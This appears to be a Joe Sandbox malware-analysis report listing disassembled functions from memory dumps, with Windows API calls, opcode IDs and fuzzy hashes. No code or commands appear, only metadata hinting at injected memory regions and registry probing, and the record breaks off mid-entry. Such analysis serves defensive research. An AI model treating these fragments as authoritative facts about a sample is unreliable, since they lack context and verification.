                                                                    • Instruction ID: 1ccc76b4cbf13a106b42925d7fab7e4759d56690e7cfb82d9f09a36cd1d5a7c1
                                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction Fuzzy Hash: D7612332B0529687EB54EF1590007BD7393F766BA4F6C8939EF5A07788DA38D856C700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                    • Instruction ID: d5b98cc04ea8960ac729740b88bc491c7558798f16bfa6bab5335813abfc1bb1
                                                                    • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                    • Instruction Fuzzy Hash: B251B861B0924245FE24ED259E0067AA2E1FF47BA4F94863ADE7D477D9CF3CD4428E20
                                                                    APIs
                                                                      • Part of subcall function 000001F91B321628: GetProcessHeap.KERNEL32 ref: 000001F91B321633
                                                                      • Part of subcall function 000001F91B321628: HeapAlloc.KERNEL32 ref: 000001F91B321642
                                                                      • Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B3216B2
                                                                      • Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B3216DF
                                                                      • Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B3216F9
                                                                      • Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B321719
                                                                      • Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B321734
                                                                      • Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B321754
                                                                      • Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B32176F
                                                                      • Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B32178F
                                                                      • Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B3217AA
                                                                      • Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B3217CA
                                                                    • Sleep.KERNEL32 ref: 000001F91B321AD7
                                                                    • SleepEx.KERNEL32 ref: 000001F91B321ADD
                                                                      • Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B3217E5
                                                                      • Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B321805
                                                                      • Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B321820
                                                                      • Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B321840
                                                                      • Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B32185B
                                                                      • Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B32187B
                                                                      • Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B321896
                                                                      • Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B3218A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1534210851-0
                                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction ID: 18f3ffec59d8cf1e5afa28952b6053f02dfc28ca0b951f5ba4caeeea138d7a92
                                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction Fuzzy Hash: 7131A87921AE4751EB50BF27DB413FD63A6AB44BE0F1C54B19E0987695EF24C8738210
                                                                    APIs
                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF727279CE5,?,?,00000000,00007FF727279D9A), ref: 00007FF727279ED6
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF727279CE5,?,?,00000000,00007FF727279D9A), ref: 00007FF727279EE0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseErrorFindLastNotification
                                                                    • String ID:
                                                                    • API String ID: 1687624791-0
                                                                    • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                    • Instruction ID: 766cbbdda8a6eeea38808c7bac284e9bcaecef7f5f45e04ce3dfe082177b4945
                                                                    • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                    • Instruction Fuzzy Hash: F5218011B1C78241FB90B764AF5027DA2E1DF8A7A0F945239D96E5B3D2CF6CA4428B20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                    • Instruction ID: 303eead3589afe6813b115aa3c9923a1967ccf8ae581c23888bc17542eafc2bf
                                                                    • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                    • Instruction Fuzzy Hash: 6711C861708B8181DA10AB25AE14169B3B1EB46BF4F940331EE7D4BBE5CF3CD0528B10
                                                                    APIs
                                                                    • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF727282032,?,?,?,00007FF72728206F,?,?,00000000,00007FF727282535,?,?,?,00007FF727282467), ref: 00007FF727279C6E
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF727282032,?,?,?,00007FF72728206F,?,?,00000000,00007FF727282535,?,?,?,00007FF727282467), ref: 00007FF727279C78
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                    • String ID:
                                                                    • API String ID: 588628887-0
                                                                    • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                    • Instruction ID: bb91621a1c8cd27d9823a293530d54fc6922f846e711fd56abedb0cc166d3d3f
                                                                    • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                    • Instruction Fuzzy Hash: C9E04610F0868282FF087BB2AF4517A92F1DF9A740F904038C90D9A261EF3C68478E30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dialer
                                                                    • API String ID: 0-3528709123
                                                                    • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                    • Instruction ID: 69db7227c35e56c416ded0af5df670c04cc034a984b27358d7187312f541d5e7
                                                                    • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                    • Instruction Fuzzy Hash: 6AD05E7035A20B8AFB18AFA688C87B52362EB047A4F8C4030990005160DB1899AE9A10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                    • Instruction ID: 030692ad8820f1142cb68a7dae80780604cf6e6f18ec28bedc5996b8449e35f6
                                                                    • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                    • Instruction Fuzzy Hash: 0D41B03290934187EA24AB19AB4127DB3F1EB57B91F941131DA8E8B691CF3CE503CB61
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 840049012-0
                                                                    • Opcode ID: 941833cdd6d9a3473ebad575b8c115bf759600ca6544244daae46ef6744f2c78
                                                                    • Instruction ID: 76b49e14e8cf7171e35c856531ee843f0647b07e8e79dc3d295b6f7d2b780f4b
                                                                    • Opcode Fuzzy Hash: 941833cdd6d9a3473ebad575b8c115bf759600ca6544244daae46ef6744f2c78
                                                                    • Instruction Fuzzy Hash: F7216F21B1965246FA11BE16AF043BAE6A1FF47BD4FC89435DD0D0A786DF7DE042CA20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                    • Instruction ID: 137ed516a5d77fd78dfcabce804b86d418527f14fe4b198e71d8239ad0b2c553
                                                                    • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                    • Instruction Fuzzy Hash: B1316D21E1864286F711BB199F4137DA6F0EB52BA1F910239EA1D0B3D2CF7CE4428B35
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                    • String ID:
                                                                    • API String ID: 3947729631-0
                                                                    • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                    • Instruction ID: d649420fba7b55c5369fa07c55c7e8e2f8dfca3da56952c23cc68b01ef67bbf9
                                                                    • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                    • Instruction Fuzzy Hash: 03219F32A1570589EB24AF74CA412FC73F4FB05718F94463AD62C4AAD5DF38D446CB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                    • Instruction ID: ed1c61d44b5e6d886afc248af1dfafcaefd3b0997b331501b0c82e8d9d3d60bf
                                                                    • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                    • Instruction Fuzzy Hash: 3C116521A1D65142EA60BF529B0117EE2F8EF57B80F944135EA4C5FA95CF3CD442CF60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                    • Instruction ID: f198c3fc4c5ccb75b498119b0590a803f6dab33fcce2e46331b5b47a36cf9f8f
                                                                    • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                    • Instruction Fuzzy Hash: 0321DA3260865186DB619F19DA40379B2F1FB86B94F944334D65D876D9DF3DD402CF20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                    • Instruction ID: 432756ddce5226090d12b2c10987528f0e32707aae9a06fdb6aec51cf237261f
                                                                    • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                    • Instruction Fuzzy Hash: 51018221A0874240EA05EB565E01469E6F5EB57FE0F888635EE5C57BD6DF3CD4038B10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                    • Instruction ID: 5e72373508a4bba72236e84f7b612d189d3d5744653ba276468c9bc2491bad90
                                                                    • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                    • Instruction Fuzzy Hash: 4B015E20A0968342FEA0BAA56F42579A2F0EF47794F940634F96C4A7D6DF2CE4534A20
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72727A63A,?,?,?,00007FF7272743FD,?,?,?,?,00007FF72727979A), ref: 00007FF72727DEFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                    • Instruction ID: 114ca06323a254dc4f7067b128627bfdcc1ab94daf40c3132fcc84fc8d94828e
                                                                    • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                    • Instruction Fuzzy Hash: 96F04900B0A24781FE5976639F113B592F0DFAAB80FC84430C90E8A2D5DF2CA8838A31
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,?,?,00007FF72726FFB0,?,?,?,00007FF72727161A,?,?,?,?,?,00007FF727272E09), ref: 00007FF72727C94A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                    • Instruction ID: bec86a908da41ac9107fb9c9a6255de3528cbf0712982d904a3a0e3fdd8e9478
                                                                    • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                    • Instruction Fuzzy Hash: C4F05E00F1A24785FE9476715F1137591E4DF4A7A0F881630D82E8A2C1EF2CE6838930
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                    • Instruction ID: a450e3f066fd1b5554a5a4bd2bc1a27e63ce2282856cd499c501bfd8bae8fd61
                                                                    • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                    • Instruction Fuzzy Hash: BDE0B690E4824782FA247AA84F82679A1B0DF6A340FD05030D9484E383DF2C78469A31
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction ID: e5f809cb6a5ee8dc7b1d6a5f5442ecb9273552bfb423fdfab4456d07e3d3da51
                                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction Fuzzy Hash: C661F072B0A69687DB54AF1598007BDB3A3FB54BA4F5C8131EE5907788DA38E873C700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3140674995-0
                                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction ID: 165fded862357c49b229c2374806ae23b177be964f72ff61f05ec585c09f46a0
